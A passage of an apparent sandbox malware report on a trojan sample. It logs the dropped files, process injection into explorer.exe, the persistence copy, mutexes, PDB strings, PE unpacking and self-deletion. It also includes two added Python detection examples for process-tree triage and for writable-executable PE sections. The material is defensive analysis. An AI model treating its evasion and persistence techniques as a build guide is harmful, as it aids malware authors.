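The "Process created" entries above form a small process tree: an injected explorer.exe starts ADCA.exe and 5AF.exe from the user's Temp directory, ADCA.exe hands a dropped DLL to rundll32.exe, and WerFault.exe collects the crash of that rundll32 instance (PID 4912), while the persistence copy dfhwrav in AppData\Roaming has no file extension at all. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it runs three parent/child heuristics over a constructed event list modelled on those entries (the notepad.exe line is a benign control added for contrast). The heuristic names, the USER_WRITABLE pattern and the helper functions are this example's own choices, not report features.

```python
"""Process-tree triage over sandbox-style 'Process created' events (added example)."""
import re
from pathlib import PureWindowsPath

# Directories an unprivileged user can write to; every payload in this report lives here.
USER_WRITABLE = re.compile(r"\\AppData\\(Local\\Temp|Roaming)\\", re.IGNORECASE)

# Constructed sample modelled on the report's entries: (parent image, child command line).
# The final notepad.exe event is a benign control and is not in the report.
SAMPLE_EVENTS = [
    ("unknown", r"C:\Users\user\Desktop\file.exe"),
    ("unknown", r"C:\Users\user\AppData\Roaming\dfhwrav"),
    (r"C:\Windows\explorer.exe", r"C:\Users\user\AppData\Local\Temp\ADCA.exe"),
    (r"C:\Users\user\AppData\Local\Temp\ADCA.exe",
     r"C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start"),
    (r"C:\Windows\explorer.exe", r"C:\Users\user\AppData\Local\Temp\5AF.exe"),
    (r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe"),
]


def split_cmdline(cmdline: str):
    """Split a command line into (image path, argument string); the image may be quoted."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.index('"', 1)
        return cmdline[1:end], cmdline[end + 1:].strip()
    parts = cmdline.split(" ", 1)
    return parts[0], (parts[1].strip() if len(parts) > 1 else "")


def classify(parent: str, cmdline: str) -> list:
    """Return the names of the heuristics that fire for one parent -> child event."""
    image, args = split_cmdline(cmdline)
    image_name = PureWindowsPath(image).name.lower()
    parent_name = PureWindowsPath(parent).name.lower()
    findings = []
    # explorer.exe launching executables from %TEMP%/%APPDATA%: in this report explorer is
    # the injected host that drops and starts ADCA.exe and 5AF.exe.
    if parent_name == "explorer.exe" and USER_WRITABLE.search(image):
        findings.append("explorer_spawns_from_user_writable")
    # rundll32 given a DLL that sits in a user-writable directory ("...\Serpodtudpwhhta.dll,start").
    if image_name == "rundll32.exe":
        dll = args.split(",", 1)[0].strip('"')
        if USER_WRITABLE.search(dll):
            findings.append("rundll32_dll_from_user_writable")
    # An image with no extension under AppData (dfhwrav) is unusual for legitimate software.
    if USER_WRITABLE.search(image) and not PureWindowsPath(image).suffix:
        findings.append("extensionless_image_in_user_writable")
    return findings


def triage(events) -> dict:
    """Run classify over (parent, cmdline) pairs; return {cmdline: findings} for hits only."""
    hits = {}
    for parent, cmdline in events:
        findings = classify(parent, cmdline)
        if findings:
            hits[cmdline] = findings
    return hits


if __name__ == "__main__":
    for cmdline, findings in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(findings):40s} {cmdline}")
```

Run against the constructed list, four of the seven events are flagged: both explorer.exe launches from Temp, the rundll32 load of the dropped DLL, and the extensionless dfhwrav image; file.exe on the Desktop, the WerFault crash handler and the notepad.exe control stay clean. The crash itself (WerFault with -p 4912) is worth correlating separately, since it is the rundll32 instance carrying the dropped DLL that crashed.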
                Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\dfhwrav
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\ADCA.tmp
                Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@13/9@36/7
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_006FC9EE CreateToolhelp32Snapshot,Module32First,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe | Mutant created: \Sessions\1\BaseNamedObjects\WTfewgNmxpcaVXHKTu
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4912
                Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: setupapi.pdbf source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: cryptbase.pdbD source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb0f source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msctf.pdby source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: comctl32v582.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wsspicli.pdb6 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: fltLib.pdbR source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mpr.pdbA source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: sechost.pdb0 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Qrundll32.pdb source: WerFault.exe, 00000013.00000003.506255817.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.489353790.000000000473F000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.494807738.000000000473F000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: Qrundll32.pdb^t source: WerFault.exe, 00000013.00000003.527460296.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.527287787.0000000004740000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 5AF.exe, 00000010.00000002.485930859.0000000000410000.00000040.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000002.517131758.0000000000410000.00000040.00000001.01000000.0000000B.sdmp
                Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdbz source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: shell32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: combase.pdbt source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\yepiro_lafonu\vekamogudit62\deney\jef.pdb source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: version.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: propsys.pdb` source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: oleaut32.pdbl source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: IC:\yepiro_lafonu\vekamogudit62\deney\jef.pdb0f source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdbJ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: rundll32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: profapi.pdb^ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netutils.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netapi32.pdbk source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Unpacked PE file: 10.2.ADCA.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe | Unpacked PE file: 16.2.5AF.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe | Unpacked PE file: 22.2.5AF.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Unpacked PE file: 9.2.dfhwrav.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Unpacked PE file: 10.2.ADCA.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.didata:W;.edata:R;.tls:W;.rdata:R;.reloc:R;.rsrc:R;
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe | Unpacked PE file: 16.2.5AF.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe | Unpacked PE file: 22.2.5AF.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401F47 pushad ; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401F62 pushad ; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401E7D pushad ; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401F2F pushad ; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401F3A pushad ; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004019C7 push esp; retf
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402DCB push FFFFFF9Bh; retf
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02071A2E push esp; retf
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02071F96 pushad ; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02071FA1 pushad ; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02071FAE pushad ; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02071FC9 pushad ; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02071EE4 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_00401F47 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_00401F62 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_00401E7D pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_00401F2F pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_00401F3A pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_004019C7 push esp; retf
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_00402DCB push FFFFFF9Bh; retf
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_006D1A2E push esp; retf
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_006D1EE4 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_006D1FC9 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_006D1FAE pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_006D1FA1 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_006D1F96 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_006FDD39 push esp; retf
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_00422F40 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_025CB597 pushad ; iretd
                Source: Serpodtudpwhhta.dll.10.dr | Static PE information: section name: .didata
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\dfhwrav
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\5AF.exe
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | File created: C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\ADCA.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\dfhwrav
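The "Unpacked PE file" entries above give two sets of section rights for the same image in the report's letter notation (for file.exe and dfhwrav: .text:ER;.data:W;.rsrc:R; vs .text:EW;). Whichever side is the on-disk layout and whichever the memory dump, a .text section that is both executable and writable is what the "changes PE section rights" and "overwrites its own PE header" signatures key on, since code that decrypts itself in place needs write access to its own code section. The Python below is an added example and is not code from the report or from the sample: it parses section headers directly with struct (no pefile dependency), flags sections that are writable and executable at once, and diffs two header sets in the same E/R/W notation. The two PE images it checks are header-only byte strings built inside the block and are constructed for the example; build_pe, the E/R/W rendering and the function names are this example's own.

```python
"""Flag writable+executable PE sections and diff section rights (added example)."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def section_headers(pe: bytes):
    """Yield (name, characteristics) for every section header in a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                        # IMAGE_FILE_HEADER, 20 bytes
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)
    first = coff + 20 + opt_size               # section table follows the optional header
    for i in range(num_sections):
        off = first + i * 40                   # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars, = struct.unpack_from("<I", pe, off + 36)
        yield name, chars


def rights(chars: int) -> str:
    """Section rights in the report's letter notation: E (execute), R (read), W (write)."""
    bits = (("E", IMAGE_SCN_MEM_EXECUTE), ("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE))
    return "".join(letter for letter, bit in bits if chars & bit)


def writable_executable(pe: bytes) -> list:
    """Names of sections that are both writable and executable."""
    return [name for name, chars in section_headers(pe)
            if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE]


def diff_rights(a: bytes, b: bytes) -> dict:
    """{section: (rights in a, rights in b)} for sections whose rights differ.
    A section present in a but absent from b is reported with empty rights for b."""
    ra = {name: rights(chars) for name, chars in section_headers(a)}
    rb = {name: rights(chars) for name, chars in section_headers(b)}
    return {name: (ra[name], rb.get(name, "")) for name in ra if ra[name] != rb.get(name, "")}


def build_pe(sections) -> bytes:
    """Constructed header-only PE32 for this example: DOS header, NT signature, COFF header,
    a zero-filled optional header and the given (name, characteristics) section headers.
    It is enough for a header parser; it is not a loadable executable."""
    opt_header = b"\x0b\x01" + b"\0" * 222     # PE32 magic, rest of the 224-byte header zeroed
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt_header), 0x0102)
    table = b"".join(struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                                 0, 0, 0, 0, 0, 0, 0, 0, chars) for name, chars in sections)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew at 0x3C points to 0x40
    return dos + b"PE\0\0" + coff + opt_header + table


# Constructed samples shaped like the report's "vs" pairs: a conventional three-section
# layout, and a dump in which .text has been made writable for in-place unpacking.
ON_DISK = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])
DUMPED = build_pe([(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE)])

if __name__ == "__main__":
    print("W+X sections in dump:", writable_executable(DUMPED))
    print("rights changed:", diff_rights(ON_DISK, DUMPED))
```

On the constructed pair, writable_executable reports .text for the dump and nothing for the conventional layout, and diff_rights renders the change as ("ER", "EW"), the same notation the report uses. Any real on-disk sample and its memory dump can be passed to the same two functions; a W+X code section in a file that ships from a normal compiler toolchain is a strong unpacker indicator on its own.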

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\file.exe
                Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\dfhwrav:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_0085E760 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
